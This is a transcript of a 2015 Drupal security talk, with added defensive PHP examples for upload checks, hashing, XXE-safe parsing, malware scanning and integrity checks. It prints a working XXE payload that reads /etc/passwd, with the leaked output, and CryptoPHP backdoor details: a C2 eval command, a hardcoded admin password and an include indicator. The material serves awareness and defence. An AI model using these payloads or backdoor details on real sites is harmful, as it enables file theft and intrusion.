Uploaded by sydneydrupal on 07-Aug-2015

Drupal, Lessons learnt from real world security incidents

Dr. Pedram Hayati
Principal IT Security Consultant
SecDim
21 May 2015

Drupal Security

• Looking from an attacker angle
• Targeting the software
  • Publicly known weaknesses or 0days
  • Drupal core or modules
• Targeting a user
  • Social engineering
• Targeting a developer
  • Watering hole attacks

What a security tester should know!

• Security is not a high priority
  • Sad but true
  • If software is not usable, it doesn't matter whether it is secure or not.
  • The security tester is not the only stakeholder
• Learn the terminology
  • "Defect" and "bug" instead of "0day" and "vulnerability"
  • "Enhancement" instead of "best practice recommendation"
• Explain "how to fix", not "how to break"
  • Security testers are excited to show how to hack the planet
  • Developers care about how to fix things effectively
  • One size doesn't fit all.
  • Spending a lot on issue detail but little on the remediation plan.
• Show some respect!
  • Bashing developers and being negative toward them.

Targeting software

Pre-Auth SQL Injection in Drupal Core

• 15 October 2014
  • A major SQL injection vulnerability within Drupal Core

• CVE-2014-3704

• Likelihood: Pre-auth

• Impact: privilege escalation, code execution

• You are likely compromised if you haven’t patched your Drupal within 7 hours of this issue being announced.

• https://www.drupal.org/node/2357241

Hardening - Generic

• Remember, Drupal has a higher risk profile.
• Subscribe to security feeds
• Have backups and make sure they work
• Be ready and prepare your (basic) incident response strategy
• References
  • Drupal security feed: https://www.drupal.org/security/psa
  • Security team contact: https://security.drupal.org/team-members
  • Incident response plan: http://www.comptechdoc.org/independent/security/policies/incident-response-plan.html
  • https://twitter.com/drupalsecurity

Hardening – Secure coding

• Myth #1: Defend as close as possible to the destination
  • Use parametrized queries
  • Use db_query() and db_rewrite_sql() and never concatenate the data
  • Use Drupal's check functions for output filtering
  • Use check_plain(), check_markup(), check_url() and filter_xss()
  • There is no such thing as JavaScript (client-side) validation
• Myth #2: It is not just input and output handling
  • Understand Cross-Site Request Forgery (XSRF)
  • Use the Form API
• Myth #3: File upload is difficult to secure
  • Avoid file upload where possible
  • Re-produce the file (e.g. with the GD library)
  • Check the MIME type, magic numbers, byte codes.
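The Myth #3 advice (check magic numbers, then re-produce the file with GD) as a worked example. This is added code, not from the talk; it assumes the fileinfo and GD extensions are loaded, and the function name and sample files are ours.

```php
<?php
// Added example, not from the talk: validate an upload the way the slide
// recommends (magic bytes, image header) and then re-produce the file with GD.
// Assumes the fileinfo and GD extensions are enabled. Function name is ours.

function accept_image_upload(string $tmpPath, string $destPath): bool
{
    // 1. Decide the type from content (libmagic), never from the client's
    //    filename or Content-Type header.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($tmpPath);
    if (!in_array($mime, ['image/png', 'image/jpeg', 'image/gif'], true)) {
        return false;
    }
    // 2. The image header must parse and agree with the magic-byte type.
    $info = @getimagesize($tmpPath);
    if ($info === false || image_type_to_mime_type($info[2]) !== $mime) {
        return false;
    }
    // 3. Re-produce the file: decode the pixels and write a brand-new PNG.
    //    Anything appended after the image data (a polyglot) does not survive.
    $img = @imagecreatefromstring((string) file_get_contents($tmpPath));
    if ($img === false) {
        return false;
    }
    $ok = imagepng($img, $destPath);
    imagedestroy($img);
    return $ok;
}

// Constructed inputs: a genuine 1x1 PNG, and the same PNG with an inert PHP
// tag appended (the trick behind "include('images/social.png')").
$clean = tempnam(sys_get_temp_dir(), 'up');
$src   = imagecreatetruecolor(1, 1);
imagepng($src, $clean);
imagedestroy($src);
$polyglot = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($polyglot, file_get_contents($clean) . "<?php /* marker */ ?>");

foreach (['clean' => $clean, 'polyglot' => $polyglot] as $label => $path) {
    $out      = tempnam(sys_get_temp_dir(), 'safe');
    $accepted = accept_image_upload($path, $out);
    $carried  = $accepted && strpos((string) file_get_contents($out), '<?php') !== false;
    printf("%-8s accepted=%s php_tag_in_output=%s\n", $label,
        $accepted ? 'yes' : 'no', $carried ? 'yes' : 'no');
}
```

Both inputs pass the magic-number and header checks because the polyglot starts with a valid PNG; the re-encode step is what strips the appended tag.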

Hardening – Secure coding

• Myth #4: Remember, hash algorithms are ever evolving
  • MD5 = plaintext. SHA-1 ~= plaintext
• Use a slow hashing algorithm
  • scrypt -> bcrypt (15 rounds) -> PBKDF2 with SHA-256
• Salt the hash
• Use Hash-based Message Authentication Code (HMAC)
  • drupal_hmac uses SHA-256, which is not recommended.
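The slow, salted hashing the slide asks for, in the slide's order of preference (bcrypt first, PBKDF2 with SHA-256 as the fallback), with a constant-time check. Added example, not code from the talk; assumes PHP 7.0 or later, and the function names and demo passwords are ours. Cost 15 as on the slide takes seconds per hash, so the script is deliberately slow.

```php
<?php
// Added example, not from the talk: slow, salted password hashing plus a
// constant-time check. Assumes PHP >= 7.0 (random_bytes). Names are ours.

// bcrypt via password_hash(): the salt is generated and stored inside the
// hash string, so nothing extra has to be kept. Cost 15 as on the slide
// means roughly seconds per hash, which is the point (tune to your hardware).
const BCRYPT_COST = 15;

function hash_password(string $password): string
{
    return password_hash($password, PASSWORD_BCRYPT, ['cost' => BCRYPT_COST]);
}

function check_password(string $password, string $stored): bool
{
    // password_verify() compares in constant time and reads cost+salt from $stored.
    return password_verify($password, $stored);
}

// PBKDF2 with SHA-256, the slide's fallback when bcrypt/scrypt are unavailable.
// Here the caller must store the random salt next to the hash.
function pbkdf2_hash(string $password, string $salt, int $iterations = 100000): string
{
    return hash_pbkdf2('sha256', $password, $salt, $iterations, 64);
}

function pbkdf2_check(string $password, string $salt, string $storedHex, int $iterations = 100000): bool
{
    // hash_equals() does not leak how many leading bytes matched.
    return hash_equals($storedHex, pbkdf2_hash($password, $salt, $iterations));
}

// Constructed demo values.
$stored = hash_password('correct horse battery staple');
echo 'bcrypt, right password: ', check_password('correct horse battery staple', $stored) ? 'ok' : 'fail', "\n";
echo 'bcrypt, wrong password: ', check_password('Tr0ub4dor&3', $stored) ? 'ok' : 'fail', "\n";

$salt = random_bytes(16);   // per-user random salt
$pbk  = pbkdf2_hash('correct horse battery staple', $salt);
echo 'pbkdf2, right password: ', pbkdf2_check('correct horse battery staple', $salt, $pbk) ? 'ok' : 'fail', "\n";
// password_needs_rehash() lets you raise the cost later without a reset,
// which is how you cope with "hash algorithms are ever evolving".
```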

Pre-Auth XXE

• 24 March 2015
  • XML External Entity (XXE)
• The XML document references a user-controllable field that includes an external entity
• A weakness within the Services module
• Allows arbitrary file read (e.g. settings.php)
• By Renaud Dubourguais from Synacktiv on 24 March 2015
• http://www.synacktiv.fr/ressources/synacktiv_drupal_xxe_services.pdf

Pre-Auth XXE: Sample payload

POST /drupal7.28/?q=test/node HTTP/1.1
[...]

<!DOCTYPE root [
<!ENTITY % evil SYSTEM "file:///etc/passwd">
%evil;
]>
<xml>
<test>test</test>
</xml>

Pre-Auth XXE: Response

<?xml version="1.0" encoding="utf8"?>
<result>Line 5, Col 9: failed to load external entity
&quot;file://W00Tcm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi
91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzO
ng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMK
Z2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9
jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG
9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhc
i9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNy
L3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDo
zMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci
9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCg==W00T&quot;
Line 9, Col 27: Opening and ending tag mismatch: test line 9 and type
</result>

Pre-Auth XXE: Response (base64 decoded)

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

How to fix it?

• Input validation?

• Output validation or rendering?

• Business logic
• Access control
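One concrete answer to "How to fix it?" for the XXE above: refuse any DTD in an API request body and make sure libxml cannot fetch external entities, before the document is parsed at all. Added example, not the Services module's fix or code from the talk; assumes PHP 7.1 or later, and the function name is ours.

```php
<?php
// Added example, not from the talk: parse an untrusted XML body so that an
// external entity like the slide's "%evil;" can never be declared or fetched.
// Assumes PHP >= 7.1 (nullable return type). Function name is ours.

function parse_untrusted_xml(string $body): ?DOMDocument
{
    // A legitimate API client has no reason to send a DOCTYPE. Rejecting it up
    // front blocks internal-subset tricks before libxml ever sees them.
    if (preg_match('/<!DOCTYPE/i', $body)) {
        return null;
    }
    // PHP < 8.0: libxml would otherwise fetch file:// and http:// entities.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    // LIBXML_NONET forbids network access. LIBXML_NOENT is deliberately NOT
    // set: that flag would turn entity substitution on.
    $ok = $dom->loadXML($body, LIBXML_NONET);
    libxml_clear_errors();
    if (!$ok || $dom->doctype !== null) {
        return null;   // belt and braces: no DTD survives either
    }
    return $dom;
}

// Constructed inputs: the benign body from the slide and the XXE attempt.
$benign = "<xml><test>test</test></xml>";
$xxe = "<!DOCTYPE root [\n<!ENTITY % evil SYSTEM \"file:///etc/passwd\">\n%evil;\n]>\n"
     . "<xml><test>test</test></xml>";

foreach (['benign' => $benign, 'xxe' => $xxe] as $label => $body) {
    $dom = parse_untrusted_xml($body);
    if ($dom === null) {
        echo "$label: rejected before any entity could be resolved\n";
    } else {
        $value = $dom->getElementsByTagName('test')->item(0)->textContent;
        echo "$label: accepted, test=$value\n";
    }
}
```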

Targeting user

CryptoPHP

• 20 November 2014, by Fox-IT
  • A large number of backdoored CMSs, including Drupal, Joomla and WordPress
• Used for blackhat SEO
• Spread through
  • Pirated themes
  • Commercial plugins for free
  • Nulled scripts

CryptoPHP

• C2 communication
  {"servers": ["127.0.0.1", "127.0.0.2"],
   "eval": ["print(system('ls -la'));", "phpinfo();"],
   "echo": ["strings to be echoed", "etc."]
  }
• Mail communication
  • For failover
• Manual control
  • http://127.0.0.1/index.php?<serverkey>=reset
• Encrypted communication
• Adds a new admin account for future access
  • Username: system[0-9]*
  • Password: FUHIAsbdiugAS

Remediation

• Look inside your theme (and modules) directory for:
  <?php include('images/social.png'); ?>
• Check the authenticity of your packages
  • Use legitimate sources
• Check the integrity of the downloaded packages
  • Checksum
• More info: https://foxitsecurity.files.wordpress.com/2014/11/cryptophp-whitepaper-foxsrt-v4.pdf
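A small scanner for the first remediation step above: it walks a theme or module tree for the include-of-an-image pattern the slide names, and goes one step further by flagging image files that carry a PHP open tag. Added example, not Fox-IT's or the talk's code; the function name, the regex and the constructed sample tree are ours.

```php
<?php
// Added example, not from the talk: scan a theme/module tree for the CryptoPHP
// tell-tales: an include/require of a non-PHP file (the "images/social.png"
// trick) and image files that actually contain PHP code. Names are ours.

function scan_for_cryptophp(string $root): array
{
    $findings   = [];
    $incPattern = '/\b(?:include|require)(?:_once)?\s*\(?\s*[\'"][^\'"]*\.(?:png|jpe?g|gif|ico|txt)[\'"]/i';
    $imageExts  = ['png', 'jpg', 'jpeg', 'gif', 'ico'];
    $iter = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(
        $root, FilesystemIterator::SKIP_DOTS));
    foreach ($iter as $file) {
        $path = $file->getPathname();
        $ext  = strtolower($file->getExtension());
        // Only the first 64 KiB is read; both indicators sit near the top.
        $head = (string) file_get_contents($path, false, null, 0, 65536);
        if ($ext === 'php' && preg_match($incPattern, $head, $m)) {
            $findings[] = "$path: includes a non-PHP file: " . trim($m[0]);
        }
        if (in_array($ext, $imageExts, true) && stripos($head, '<?php') !== false) {
            $findings[] = "$path: image file contains a PHP open tag";
        }
    }
    return $findings;
}

// Constructed sample tree mimicking a backdoored theme. Nothing here is executed.
$root = sys_get_temp_dir() . '/cryptophp_demo_' . bin2hex(random_bytes(4));
mkdir("$root/images", 0700, true);
file_put_contents("$root/template.php", "<?php include('images/social.png'); ?>\n");
file_put_contents("$root/images/social.png", "\x89PNG\r\n\x1a\n<?php /* marker */ ?>");
file_put_contents("$root/images/logo.png", "\x89PNG\r\n\x1a\n");
file_put_contents("$root/clean.php", "<?php require_once 'includes/helpers.php'; ?>\n");

foreach (scan_for_cryptophp($root) as $finding) {
    echo $finding, "\n";
}
```

Expect two findings (template.php and images/social.png); clean.php and logo.png are not reported.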

Targeting developer

Watering Hole Attack

• An attack strategy targeted at user groups
  • Developers, operations, normal users
• Commonly a website used by the victim group is infected; the victim group is eventually infected through that website.
• November 2014
  • Forbes.com compromised
  • 0day for IE and Flash
  • Target
    • US defence
    • Financial services

Awareness

• Developers
  • Typically have highly privileged access on the local machine or network services
• Increase the security of your browser
  • Addon: NoScript
  • Addon: Web of Trust (WOT)
  • Use a different profile or browser for surfing the web and for doing work
  • Have a read about the capabilities of the BeEF framework
  • http://beefproject.com/
• Increase the security of your email client
  • Increase the security settings of Outlook
  • Default all emails to plain text
  • Keep personal and work email in separate email clients
  • Even on your smartphone
• Use trusted sources
  • Verify the integrity of downloaded files

Unhack my website

1. Make a (forensic) copy of your entire server
   1. Do not change anything
   2. Get a snapshot of your Cloud/VM instance
2. Take your website offline
3. Notify users and stakeholders.
4. Start the investigation process
   1. It is likely automated. Search for known signatures
   2. Check the integrity of all files
      1. Drupal Hacked module: https://www.drupal.org/project/hacked
   3. Use available tools
      1. Sort files and other data based on time
      2. Create a timeline
   4. Call for help
5. Rebuild your website
   1. Restore an older snapshot
   2. Apply all patches.
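Steps 4.2 and 4.3 of the procedure above in one script: compare the live webroot against a clean copy of the same release (the check the Hacked module automates), then sort what differs by modification time so the earliest tampering stands out. Added example, not the Hacked module's code or code from the talk; assumes PHP 7.4 or later, and the function names and sample directories are ours.

```php
<?php
// Added example, not from the talk: integrity check of all files against a
// clean copy of the same release, then a time-sorted list of what differs.
// Assumes PHP >= 7.4 (arrow functions). Names and sample dirs are ours.

function list_files(string $root): array
{
    $files = [];
    $iter = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(
        $root, FilesystemIterator::SKIP_DOTS));
    foreach ($iter as $f) {
        $rel = substr($f->getPathname(), strlen($root) + 1);
        $files[$rel] = ['sha256' => hash_file('sha256', $f->getPathname()),
                        'mtime'  => $f->getMTime()];
    }
    return $files;
}

// Files present only in $live, or present in both but with a different hash,
// returned oldest modification first. Remember mtime is attacker-settable, so
// treat it as a hint for the timeline, not as proof.
function integrity_timeline(string $clean, string $live): array
{
    $c    = list_files($clean);
    $rows = [];
    foreach (list_files($live) as $rel => $info) {
        if (!isset($c[$rel])) {
            $rows[] = [$info['mtime'], 'ADDED', $rel];
        } elseif (!hash_equals($c[$rel]['sha256'], $info['sha256'])) {
            $rows[] = [$info['mtime'], 'MODIFIED', $rel];
        }
    }
    usort($rows, fn($a, $b) => $a[0] <=> $b[0]);
    return $rows;
}

// Constructed sample: a clean release and a live copy with one edit and one new file.
$base = sys_get_temp_dir() . '/unhack_demo_' . bin2hex(random_bytes(4));
foreach (['clean', 'live'] as $d) {
    mkdir("$base/$d/includes", 0700, true);
    file_put_contents("$base/$d/index.php", "<?php // release\n");
}
file_put_contents("$base/clean/includes/a.inc", "<?php // release\n");
file_put_contents("$base/live/includes/a.inc", "<?php // release, tampered\n");
file_put_contents("$base/live/includes/x.php", "<?php // dropped file\n");

foreach (integrity_timeline("$base/clean", "$base/live") as [$mtime, $kind, $rel]) {
    printf("%s  %-8s %s\n", date('c', $mtime), $kind, $rel);
}
```

Run it against the forensic copy from step 1, never against the live server, so the evidence stays untouched.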

Bonus

• An actual attack can come days later
  • There are different threat actors behind attacks: https://blog.secdim.com/in-depth-analysis-of-ssh-attacks-on-amazon-ec2/
  • Go back in time
• Malware names are randomised
  • Look into outbound network connections
  • tcpdump
• Malware is renamed to legitimate executables
  • Your best friends
  • lsof
  • strace
  • netstat

Wrap up

• My point was to provide you with awareness
• Attackers find the easiest and most effective way to target
  • Software
  • Users
  • Developers
• Keep up to date with the Drupal security feed
• Get yourself engaged in local security communities.

Thank You
@pi3ch | blog.secdim.com | [email protected]